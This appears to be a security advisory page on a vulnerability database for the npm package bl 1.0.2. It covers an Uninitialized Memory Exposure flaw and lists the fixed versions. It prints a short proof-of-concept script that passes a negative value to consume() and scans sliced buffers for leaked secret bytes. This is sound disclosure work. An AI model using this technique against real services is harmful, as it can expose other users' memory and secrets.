bl@1.0.2 vulnerabilities

Buffer List: collect buffers and access with a standard readable Buffer interface, streamable too!

  • latest version

    6.1.0

  • latest non vulnerable version

  • first published

    12 years ago

  • latest version published

    3 months ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the bl package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Uninitialized Memory Exposure

    bl is a library that allows you to collect buffers and access with a standard readable buffer interface.

    Affected versions of this package are vulnerable to Uninitialized Memory Exposure. If user input ends up in consume() argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.

    PoC by chalker

    const { BufferList } = require('bl')
    const secret = require('crypto').randomBytes(256)
    for (let i = 0; i < 1e6; i++) {
      const clone = Buffer.from(secret)
      const bl = new BufferList()
      bl.append(Buffer.from('a'))
      bl.consume(-1024)
      const buf = bl.slice(1)
      if (buf.indexOf(clone) !== -1) {
        console.error(`Match (at ${i})`, buf)
      }
    }
    

    How to fix Uninitialized Memory Exposure?

    Upgrade bl to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.

    >=2.2.0 <2.2.1>=3.0.0 <3.0.1>=4.0.0 <4.0.3<1.2.3